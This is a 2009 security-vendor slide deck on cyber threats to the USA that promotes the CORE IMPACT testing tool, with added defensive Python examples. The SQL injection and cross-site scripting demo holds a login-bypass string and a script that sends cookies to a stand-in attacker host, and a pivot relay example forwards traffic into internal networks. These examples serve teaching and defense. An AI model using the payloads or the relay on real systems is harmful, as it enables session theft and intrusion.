
How Cyber Adversaries Exploit the USA


1 How Cyber Adversaries Exploit the USA
January 24, 2009
All Roads Lead to Rome: How Cyber Adversaries Exploit the USA
Tom Kellermann, CISM, VP of Security Awareness

2 History Repeats Itself
Hannibal using the Roman roads to cross the Alps
40% increase in major intrusions (US-CERT 2008)

3 Evolution of Threats Timeline

4 Key Trends
The 2008 Cisco Annual Security Report found that the overall number of disclosed vulnerabilities grew by 11.5% over 2007. Vulnerabilities in virtualization technology nearly tripled, from 35 to 103 year-over-year, and attacks are becoming increasingly blended, cross-vector and targeted, according to the report. Cisco's researchers saw 90% growth in threats originating from legitimate domains, nearly double what was seen in 2007. During the year numerous legitimate websites were infected with malicious IFrames: invisible frame tags injected into their pages by botnets that silently redirect visitors to malware-downloading sites. Because the visitor is looking at a trusted site, domain reputation and URL blacklists give little protection against this pattern.
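The injected-IFrame pattern the report describes leaves a recognisable trace in the page source: a frame that is hidden (zero size or display:none) and loads from a host other than the page's own. The following is an added example of that check, not code from the presentation or from Cisco; the sample pages are constructed and `attacker.invalid` is a reserved test domain.

```python
"""Flag hidden iframes that load from a foreign host, the signature of the
2008 wave of iframe injections on legitimate websites.

Added example, not from the original presentation. The pages below are
constructed; 'attacker.invalid' is a reserved test domain.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect every <iframe> tag together with its attributes."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """Injected frames are made invisible so the visitor notices nothing."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        w = int(attrs.get("width", "100").rstrip("px"))
        h = int(attrs.get("height", "100").rstrip("px"))
    except ValueError:  # percentages or other non-numeric sizes: not hidden
        return False
    return w <= 1 or h <= 1


def suspicious_iframes(html, page_host):
    """Return src URLs of iframes that are hidden AND load from a foreign host."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname  # None for relative URLs
        if host and host != page_host and _is_hidden(attrs):
            hits.append(src)
    return hits


# Constructed sample: a legitimate page with one injected, invisible frame.
INFECTED_PAGE = """
<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.com/help" width="600" height="400"></iframe>
<iframe src="http://attacker.invalid/in.php" width="0" height="0"
        style="display: none"></iframe>
</body></html>
"""

# A 1x1 same-origin frame (tracking pixel style) is not reported.
CLEAN_PAGE = '<html><body><iframe src="/embed" width="1" height="1"></iframe></body></html>'

if __name__ == "__main__":
    print(suspicious_iframes(INFECTED_PAGE, "www.example.com"))
```

Run it against a crawl of your own sites rather than other people's; a hit means the host serving the page was modified, which is the compromise to chase, not the redirect target.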

5 2008 Intelligence Community Statistics
55% increase in remote-access cyber intrusions
52% increase in insider cyber intrusions
22% increase in credit card fraud

6 2008 Verizon Data Breach Report
Analysis of over 500 forensic investigations:
73% resulted from external sources
18% involved insiders
39% implicated business partners
(The categories overlap: one breach can involve more than one party, which is why the figures sum to more than 100%.)

7 Blackhats: Threat Actors
Nation states
  108 countries with dedicated cyber-attack organizations
  Dragon Bytes: Chinese Information War Theory & Practice
Terrorists
  Growing sophistication
  Hamas and Al Qaeda
  Imam Samudra and Irhabi 007
Organized crime
  Cybercrime is big business, e.g. the Russian Business Network (RBN)
  FBI: #1 criminal priority is cybercrime

8 Modern Maginot Lines
Early 1990s: Virus scanners
Mid 1990s: Firewalls
Late 1990s: Over-reliance on encryption (PKI)
Early 2000s: Over-reliance on IDS
Late 2000s: Over-reliance on intrusion prevention systems / artificial intelligence
As business transactions are pushed outside traditional enterprise boundaries, critical data is exposed. Existing perimeter-based security tools cannot handle the threats of today's pervasive computing environment. Virus scanners pick up only about 35% of known viruses and worms, and tools like Golden Hacker Defender, on sale for less than $100, mask code so that it circumvents signature-based detection on all commercial AV scanners. PKI private keys are stolen at will from users' C drives, where they sit unprotected on disk, by attackers who then use the victim's own encryption as a covert tunnel to bypass forensics tools: traffic under a stolen key is indistinguishable from legitimate encrypted traffic and cannot be inspected.
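The "stolen at will from C drives" problem is, in practice, keys written to disk without a passphrase. A defender can find those before an attacker does by walking the filesystem and checking the PEM envelope. This is an added example, not the presenter's or any vendor's code; the key bodies are constructed placeholders (dummy base64, not real key material) and the scanned directory is a temporary one created by the example itself.

```python
"""Find private keys sitting unprotected on disk.

Added example, not from the presentation. The PEM bodies below are
constructed placeholders (dummy base64, not real key material); only the
PEM envelope and headers matter for the check.
"""
import base64
import os
import re
import tempfile

BEGIN = re.compile(r"-----BEGIN ([A-Z ]+)-----")


def _body(text):
    """Base64 payload between the BEGIN/END lines, headers and blanks dropped."""
    return "".join(l.strip() for l in text.splitlines()
                   if l.strip() and not l.startswith("-----") and ":" not in l)


def classify_pem(text):
    """None for non-key files, else 'encrypted', 'plaintext' or 'unknown'.

    PKCS#8:          BEGIN ENCRYPTED PRIVATE KEY vs BEGIN PRIVATE KEY
    Legacy OpenSSL:  BEGIN RSA|EC|DSA PRIVATE KEY, encrypted only when a
                     'Proc-Type: 4,ENCRYPTED' + 'DEK-Info:' header is present
    OpenSSH:         BEGIN OPENSSH PRIVATE KEY; the cipher name is inside the
                     binary payload ('none' means no passphrase)
    """
    m = BEGIN.search(text)
    if not m or "PRIVATE KEY" not in m.group(1):
        return None
    label = m.group(1)
    if label == "ENCRYPTED PRIVATE KEY":
        return "encrypted"
    if label == "PRIVATE KEY":
        return "plaintext"
    if label == "OPENSSH PRIVATE KEY":
        raw = base64.b64decode(_body(text))
        if not raw.startswith(b"openssh-key-v1\x00"):
            return "unknown"
        n = int.from_bytes(raw[15:19], "big")        # length of cipher-name string
        return "plaintext" if raw[19:19 + n] == b"none" else "encrypted"
    if (re.search(r"^Proc-Type:\s*4,ENCRYPTED", text, re.M)
            and re.search(r"^DEK-Info:", text, re.M)):
        return "encrypted"
    return "plaintext"


def find_plaintext_keys(root):
    """Walk `root` and return the paths of key files stored without a passphrase."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    head = fh.read(8192)   # envelope and headers are at the top
            except OSError:
                continue
            if classify_pem(head) == "plaintext":
                hits.append(path)
    return sorted(hits)


def _openssh_sample(cipher):
    """Constructed OpenSSH envelope: magic, then the cipher-name string."""
    raw = b"openssh-key-v1\x00" + len(cipher).to_bytes(4, "big") + cipher + b"\x00" * 16
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n"
            % base64.b64encode(raw).decode())


DUMMY = "MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu"
SAMPLES = {  # constructed; none of these is a usable key
    "id_rsa":       "-----BEGIN RSA PRIVATE KEY-----\n%s\n-----END RSA PRIVATE KEY-----\n" % DUMMY,
    "id_rsa_enc":   ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                     "DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n\n%s\n"
                     "-----END RSA PRIVATE KEY-----\n" % DUMMY),
    "key.p8":       "-----BEGIN ENCRYPTED PRIVATE KEY-----\n%s\n-----END ENCRYPTED PRIVATE KEY-----\n" % DUMMY,
    "key_plain.p8": "-----BEGIN PRIVATE KEY-----\n%s\n-----END PRIVATE KEY-----\n" % DUMMY,
    "id_ed25519":   _openssh_sample(b"none"),
    "id_ed_enc":    _openssh_sample(b"aes256-ctr"),
    "server.crt":   "-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----\n" % DUMMY,
}


def demo():
    """Write the samples into a temp dir, scan it, return the flagged basenames."""
    root = tempfile.mkdtemp()
    for name, body in SAMPLES.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return [os.path.basename(p) for p in find_plaintext_keys(root)]
```

A passphrase only raises the bar; a key an attacker can read is still a key to rotate. The check also says nothing about keys held in PKCS#12 bundles or OS key stores, which need their own review.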

9 Primary Attack Vectors
Digital insider attacks: previously compromised systems used as a foothold
Client-side applications (applications running on desktop / end-user systems, including document readers, web browsers, media players, instant messengers, productivity tools such as MS Office, etc.)
Operating systems
Web applications
Wireless networks


11 2008 Trends in Attacks Against .GOV
SQL injection and cross-site scripting
Island hopping: reaching the target through a trusted third party (Unisys/DHS)
Remote user compromise: VPN attacks, client-side attacks
PKI compromise: private key theft
Zero-day attacks
Automated attack tools
Digital insider attacks
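The two web flaws at the top of this list come from the same root cause: untrusted input concatenated into a string that another parser (the SQL engine, the browser) then interprets. The following added example shows each in its vulnerable form next to the fix; it is not code from the presentation or from Core Security, the user table is constructed, and `attacker.invalid` is a reserved test domain.

```python
"""SQL injection and cross-site scripting: vulnerable form beside the fix.

Added example, not code from the presentation or from Core Security.
Uses an in-memory SQLite table with constructed user records.
"""
import html
import sqlite3

# Constructed sample data.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, name, password):
    """String-built query: attacker input becomes SQL syntax."""
    sql = ("SELECT COUNT(*) FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, name, password):
    """Parameterised query: input is bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


def render_vulnerable(comment):
    """Reflects user input into HTML verbatim, so script tags execute."""
    return "<p>%s</p>" % comment


def render_fixed(comment):
    """Escapes the HTML metacharacters (& < > " ') before reflection."""
    return "<p>%s</p>" % html.escape(comment, quote=True)


# With the password clause closed early, the OR makes the WHERE true for every row.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'


def demo():
    """Run both payloads against both versions; True means the attack landed."""
    conn = _db()
    return {
        "sqli_bypass": login_vulnerable(conn, "alice", SQLI_PAYLOAD),
        "sqli_blocked": not login_fixed(conn, "alice", SQLI_PAYLOAD),
        "xss_reflected": "<script>" in render_vulnerable(XSS_PAYLOAD),
        "xss_escaped": "<script>" not in render_fixed(XSS_PAYLOAD),
    }
```

`html.escape` is the right fix for element content and quoted attribute values only; input reflected into a script block, an event handler or a URL needs the escaping rules of that context, and a template engine that auto-escapes by default removes the chance to forget.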

12 Hosting Companies = Watering Holes
The heavy dependence of corporate America on shared Internet infrastructure makes it susceptible to cascading risk. Convergence of services and interoperability between different network types (cellular, the public switched telephone network (PSTN) and IP networks) make up a single, globally shared communications fabric. Unlike legacy systems, in which mainframes operated within closed local area networks, the new environment is an open data transmission system made up of many gateways. This facilitates global connections and cross-border sharing of information and services, but it is a double-edged sword: the same interoperability and connectivity also transmit risk, so a compromise at one hosting provider reaches every customer that depends on it.

13 Why Testing is Important
Hackers attack data where it sits 99.9% of the time: clients, servers and databases
Of all the vulnerabilities disclosed in 2007, only 50 percent can be corrected through vendor patches (ISS); the rest need configuration changes, workarounds or compensating controls, and only testing shows whether those are actually in place.
Nearly 90 percent of 2007 vulnerabilities could be remotely exploited, up one percentage point year-over-year (ISS)

14 Real-World Attack Behavior
Cybercriminals are still finding their way around, and through, point security defenses.
[Diagram: three layers, each with its own point defenses. Application layer: App Defense A/B/C, spreadsheet, browser. Host/OS layer: Host Defense A/B/C, SEIM. Network layer: Network Defense A/B/C, wireless networking devices, storage networking devices. Multistaged threats open new attack paths and exploit point-defense weaknesses to move across systems and IT layers toward the critical back-end assets: credit card numbers, customer data, employee records.]
How do you know what's working, what's not, and what to do about it?

15 Evaluate the Effectiveness of Security Point Solutions
Defend & Monitor
  Application defenses: DLP, WAF, encryption, SDLC management, monitoring, correlation (SEIM)
  Endpoint defenses: AV, patching, software firewall, HIPS, NAC
  Host defenses: AV, secure configuration, patching, HIPS
  Network defenses: UTM, firewall, IPS, IDS, AV gateway, etc.
Test
  Test defenses against 800+ exploits and 5,000+ total attack vectors, including dynamic XSS, SQL injection and RFI exploits
  Automated rapid penetration tests, plus one-step network, endpoint and vulnerability validation tests
  Ability to manually run all modules and add custom exploits
Report (actionable data)
  Executive summaries
  Detailed findings with links to fixes
  Audit trails for compliance
  Delta reports showing vulnerability management progress

16 CORE IMPACT Pro: Network Security Testing
External (or Internal) Penetration Testing

17 CORE IMPACT Pro: Web App Security Testing
[Diagram: web application server backed by a SQL database, with internal network servers and internal workstations behind it.] The user leverages the compromised web server to "pivot" the test to internal network systems.
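Mechanically, a pivot is a relay: the compromised server accepts the tester's connections and forwards them to hosts that only it can reach. The following is an added illustration of that relay, not CORE IMPACT's code or anything from the presentation. It runs entirely on loopback so it is self-contained: `internal_service()` stands in for a server only the compromised host can see, `pivot()` is the forwarder that would run on the compromised host, and `demo()` plays the tester reaching the internal service through it.

```python
"""Pivoting: a compromised host relays the tester's traffic to an internal
system it can reach but the tester cannot.

Added example, not the presentation's or CORE IMPACT's code. Everything runs
on loopback: an 'internal' service stands in for a server only the
compromised host can reach, and `pivot()` is the relay on that host.
"""
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until the source closes, then close the other side's write end."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def pivot(listen_host, target):
    """Listen on `listen_host` (ephemeral port) and forward each connection to `target`.

    Returns the bound (host, port). One pair of pump threads per client.
    """
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, 0))
    srv.listen(5)

    def accept_loop():
        while True:
            client, _ = srv.accept()
            upstream = socket.create_connection(target)   # the hop only this host can make
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


def internal_service():
    """Stand-in for an internal server: answers each request with 'INTERNAL:' + request."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                data = conn.recv(4096)
                conn.sendall(b"INTERNAL:" + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def demo():
    """Reach the internal service through the pivot and return its reply."""
    target = internal_service()
    hop = pivot("127.0.0.1", target)
    with socket.create_connection(hop, timeout=5) as s:
        s.sendall(b"hello")
        s.shutdown(socket.SHUT_WR)          # signal end of request
        reply = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


if __name__ == "__main__":
    print(demo())
```

On a real engagement the forwarder runs on the compromised server and `target` is an address in the internal range; from the tester's side every tool then talks to the pivot port as if it were the internal host. The same relay viewed from the blue team is the detection opportunity: a web server opening outbound connections to internal servers and workstations it never talked to before.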

18 Comprehensive, Real-World Security Testing
By identifying and validating the most critical, exploitable risks, IMPACT enables intelligent vulnerability remediation and helps to prioritize security initiatives.
[Diagram: the same three-layer picture as slide 14 (application, host and network defenses in front of credit card numbers, customer data and employee records, with wireless and storage networking devices), now with Operational Security and the CISO sharing one view of the results.]

19 Core Impact Awards
"Core's smart dashboard, friendly UI, attack configuration wizards, and focused reports make penetration testing easier than ever ..." - InfoWorld, January 2008
Security Software Product of the Year - TechWorld, June 2007
"We have used IMPACT in SC Labs for two years and have found nothing else that even comes close" - SC Magazine, December 2007
"After using IMPACT it seems obvious to us that manual penetration is obsolete." - Federal Computer Week, May 2006
"CORE IMPACT is an amazing tool to validate your security posture." - Information Security Magazine
Wall Street Journal Technology and Innovation Award: Runner-Up, IT Security and Privacy - September 2006
"CORE IMPACT was a blast to test and a product I am certain would benefit organizations that choose to engage it." - ISSA, May 4, 2007
eWeek Excellence Awards: Vulnerability Assessment and Remediation - May 2006

